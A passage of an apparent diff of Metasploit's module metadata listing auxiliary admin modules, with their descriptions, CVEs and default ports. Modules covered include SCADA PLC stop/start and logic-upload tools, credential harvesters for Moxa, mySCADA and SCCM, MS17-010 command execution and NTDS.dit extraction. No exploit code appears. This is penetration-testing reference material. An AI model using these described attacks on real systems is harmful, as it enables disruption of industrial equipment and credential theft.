The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_stux_transfer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/moxa_credentials_recovery": { - "name": "Moxa Device Credential Retrieval", - "fullname": "auxiliary/admin/scada/moxa_credentials_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-28", - "type": "auxiliary", - "author": [ - "Patrick DeSantis ", - "K. Reid Wightman " - ], - "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. 
Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.", - "references": [ - "CVE-2016-9361", - "BID-85965", - "URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/", - "URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02" - ], - "platform": "", - "arch": "", - "rport": 4800, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", - "is_install_path": true, - "ref_name": "admin/scada/moxa_credentials_recovery", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/multi_cip_command": { - "name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands", - "fullname": "auxiliary/admin/scada/multi_cip_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "Ruben Santamarta ", - "K. Reid Wightman ", - "todb " - ], - "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. 
This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 44818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/multi_cip_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/mypro_mgr_creds": { - "name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)", - "fullname": "auxiliary/admin/scada/mypro_mgr_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2025-02-13", - "type": "auxiliary", - "author": [ - "Michael Heinzl" - ], - "description": "Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.\n The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. 
One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16", - "CVE-2025-24865", - "CVE-2025-22896" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 34022, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-20 15:40:05 +0000", - "path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb", - "is_install_path": true, - "ref_name": "admin/scada/mypro_mgr_creds", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/pcom_command": { - "name": "Unitronics PCOM remote START/STOP/RESET command", - "fullname": "auxiliary/admin/scada/pcom_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Luis Rosa " - ], - "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.", - "references": [ - "URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf" - ], - "platform": "", - "arch": "", - "rport": 20256, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-01-29 16:19:13 +0000", - "path": "/modules/auxiliary/admin/scada/pcom_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/pcom_command", - "check": false, - "post_auth": false, - "default_credential": false, 
- "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/phoenix_command": { - "name": "PhoenixContact PLC Remote START/STOP Command", - "fullname": "auxiliary/admin/scada/phoenix_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-05-20", - "type": "auxiliary", - "author": [ - "Tijl Deneut " - ], - "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)", - "references": [ - "URL-https://github.com/tijldeneut/ICSSecurityScripts", - "CVE-2014-9195" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/phoenix_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/yokogawa_bkbcopyd_client": { - "name": "Yokogawa BKBCopyD.exe Client", - "fullname": "auxiliary/admin/scada/yokogawa_bkbcopyd_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-09", - "type": "auxiliary", - "author": [ - "Unknown" - ], - "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.", - "references": [ - "CVE-2014-5208", - 
"URL-https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access" - ], - "platform": "", - "arch": "", - "rport": 20111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 10:28:25 +0000", - "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", - "is_install_path": true, - "ref_name": "admin/scada/yokogawa_bkbcopyd_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "PMODE", - "description": "Leak the current database" - }, - { - "name": "RETR", - "description": "Retrieve remote file" - }, - { - "name": "STOR", - "description": "Store remote file" - } - ] - }, - "auxiliary_admin/sccm/get_naa_credentials": { - "name": "Get NAA Credentials", - "fullname": "auxiliary/admin/sccm/get_naa_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "xpn", - "skelsec", - "smashery" - ], - "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n This requires a computer account, which can be added using the samr_account module.", - "references": [ - "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/", - "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md", - "URL-https://github.com/Mayyhem/SharpSCCM", - "URL-https://github.com/garrettfoster13/sccmhunter" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-05-05 11:16:35 +0000", - "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb", - "is_install_path": true, - "ref_name": 
"admin/sccm/get_naa_credentials", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/serverprotect/file": { - "name": "TrendMicro ServerProtect File Access", - "fullname": "auxiliary/admin/serverprotect/file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "toto" - ], - "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.", - "references": [ - "CVE-2007-6507", - "OSVDB-44318", - "ZDI-07-077" - ], - "platform": "", - "arch": "", - "rport": 5168, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-05-12 22:15:21 +0000", - "path": "/modules/auxiliary/admin/serverprotect/file.rb", - "is_install_path": true, - "ref_name": "admin/serverprotect/file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "delete", - "description": "Delete a file" - }, - { - "name": "download", - "description": "Download a file" - }, - { - "name": "list", - "description": "List files (not recommended - will crash the driver)" - }, - { - "name": "upload", - "description": "Upload a file" - } - ] - }, - "auxiliary_admin/smb/change_password": { - "name": "SMB Password Change", - "fullname": "auxiliary/admin/smb/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "smashery" - ], - "description": "Change the password of an account using SMB. 
This provides several different\n APIs, each of which have their respective benefits and drawbacks.", - "references": [ - "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/change_password.rb", - "is_install_path": true, - "ref_name": "admin/smb/change_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CHANGE", - "description": "Change the password, knowing the existing one. New AES kerberos keys will be generated." - }, - { - "name": "CHANGE_NTLM", - "description": "Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." - }, - { - "name": "RESET", - "description": "Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated." - }, - { - "name": "RESET_NTLM", - "description": "Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs." 
- } - ] - }, - "auxiliary_admin/smb/check_dir_file": { - "name": "SMB Scanner Check File/Directory Utility", - "fullname": "auxiliary/admin/smb/check_dir_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack ", - "j0hn__f" - ], - "description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus or known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/check_dir_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/delete_file": { - "name": "SMB File Delete Utility", - "fullname": "auxiliary/admin/smb/delete_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix " - ], - "description": "This module deletes a file from a target share and path. 
The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/delete_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/delete_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/download_file": { - "name": "SMB File Download Utility", - "fullname": "auxiliary/admin/smb/download_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix " - ], - "description": "This module downloads a file from a target share and path. 
The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/download_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/download_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/list_directory": { - "name": "SMB Directory Listing Utility", - "fullname": "auxiliary/admin/smb/list_directory", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "mubix ", - "hdm " - ], - "description": "This module lists the directory of a target share and path. 
The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/list_directory.rb", - "is_install_path": true, - "ref_name": "admin/smb/list_directory", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/ms17_010_command": { - "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", - "fullname": "auxiliary/admin/smb/ms17_010_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-14", - "type": "auxiliary", - "author": [ - "sleepya", - "zerosum0x0", - "Shadow Brokers", - "Equation Group" - ], - "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0146", - "CVE-2017-0147", - "URL-https://github.com/worawit/MS17-010", - "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", - "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", - "is_install_path": true, - "ref_name": "admin/smb/ms17_010_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALSYNERGY", - "ETERNALROMANCE", - "ETERNALCHAMPION", - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/psexec_ntdsgrab": { - "name": "PsExec NTDS.dit And SYSTEM Hive Download Utility", - "fullname": "auxiliary/admin/smb/psexec_ntdsgrab", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Royce Davis " - ], - "description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. 
All of this is done without uploading a single binary to the\n target host.", - "references": [ - "URL-http://sourceforge.net/projects/smbexec", - "URL-https://www.optiv.com/blog/owning-computers-without-shell-access" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", - "is_install_path": true, - "ref_name": "admin/smb/psexec_ntdsgrab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/samba_symlink_traversal": { - "name": "Samba Symlink Directory Traversal", - "fullname": "auxiliary/admin/smb/samba_symlink_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "kcope", - "hdm " - ], - "description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. 
To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.", - "references": [ - "CVE-2010-0926", - "OSVDB-62145", - "URL-http://www.samba.org/samba/news/symlink_attack.html" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", - "is_install_path": true, - "ref_name": "admin/smb/samba_symlink_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/upload_file": { - "name": "SMB File Upload Utility", - "fullname": "auxiliary/admin/smb/upload_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module uploads a file to a target share and path. 
The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/upload_file.rb", - "is_install_path": true, - "ref_name": "admin/smb/upload_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/smb/webexec_command": { - "name": "WebEx Remote Command Execution Utility", - "fullname": "auxiliary/admin/smb/webexec_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ron Bowes " - ], - "description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2018-10-24 16:18:17 +0000", - "path": "/modules/auxiliary/admin/smb/webexec_command.rb", - "is_install_path": true, - "ref_name": "admin/smb/webexec_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/sunrpc/solaris_kcms_readfile": { - "name": "Solaris KCMS + TTDB Arbitrary File Read", - "fullname": "auxiliary/admin/sunrpc/solaris_kcms_readfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-01-22", - "type": "auxiliary", - "author": [ 
- "vlad902 ", - "jduck " - ], - "description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server\\'s TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.", - "references": [ - "CVE-2003-0027", - "OSVDB-8201", - "BID-6665", - "URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2" - ], - "platform": "", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-10-05 13:50:30 +0000", - "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", - "is_install_path": true, - "ref_name": "admin/sunrpc/solaris_kcms_readfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/teradata/teradata_odbc_sql": { - "name": "Teradata ODBC SQL Query Module", - "fullname": "auxiliary/admin/teradata/teradata_odbc_sql", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-29", - "type": "auxiliary", - "author": [ - "Ted Raffle (actuated)" - ], - "description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.", - "references": [ - "URL-https://developer.teradata.com/tools/reference/teradata-python-module", - "URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux" - ], - "platform": "", - "arch": "", - "rport": 1025, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-05-17 17:04:49 +0000", - "path": 
"/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", - "is_install_path": true, - "ref_name": "admin/teradata/teradata_odbc_sql", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "Teradata ODBC Authentication Scanner" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/tftp/tftp_transfer_util": { - "name": "TFTP File Transfer Utility", - "fullname": "auxiliary/admin/tftp/tftp_transfer_util", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. 
FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.", - "references": [ - "URL-http://www.faqs.org/rfcs/rfc1350.html", - "URL-http://www.networksorcery.com/enp/protocol/tftp.htm" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", - "is_install_path": true, - "ref_name": "admin/tftp/tftp_transfer_util", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download REMOTE_FILENAME as FILENAME from the server." - }, - { - "name": "Upload", - "description": "Upload FILENAME as REMOTE_FILENAME to the server." - } - ] - }, - "auxiliary_admin/tikiwiki/tikidblib": { - "name": "TikiWiki Information Disclosure", - "fullname": "auxiliary/admin/tikiwiki/tikidblib", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-11-01", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.", - "references": [ - "OSVDB-30172", - "BID-20858", - "CVE-2006-5702", - "URL-https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", - "is_install_path": true, - "ref_name": 
"admin/tikiwiki/tikidblib", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump user and password" - } - ] - }, - "auxiliary_admin/upnp/soap_portmapping": { - "name": "UPnP IGD SOAP Port Mapping Utility", - "fullname": "auxiliary/admin/upnp/soap_portmapping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "St0rn ", - "Jon Hart " - ], - "description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests", - "references": [ - "URL-http://www.upnp-hacks.org/igd.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", - "is_install_path": true, - "ref_name": "admin/upnp/soap_portmapping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Use the AddPortMapping SOAP command to open and forward a port" - }, - { - "name": "DELETE", - "description": "Use the DeletePortMapping SOAP command to remove a port forwarding" - } - ] - }, - "auxiliary_admin/vmware/poweroff_vm": { - "name": "VMWare Power Off Virtual Machine", - "fullname": "auxiliary/admin/vmware/poweroff_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 
443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/poweroff_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/poweron_vm": { - "name": "VMWare Power On Virtual Machine", - "fullname": "auxiliary/admin/vmware/poweron_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/poweron_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/tag_vm": { - "name": "VMWare Tag Virtual Machine", - "fullname": "auxiliary/admin/vmware/tag_vm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. 
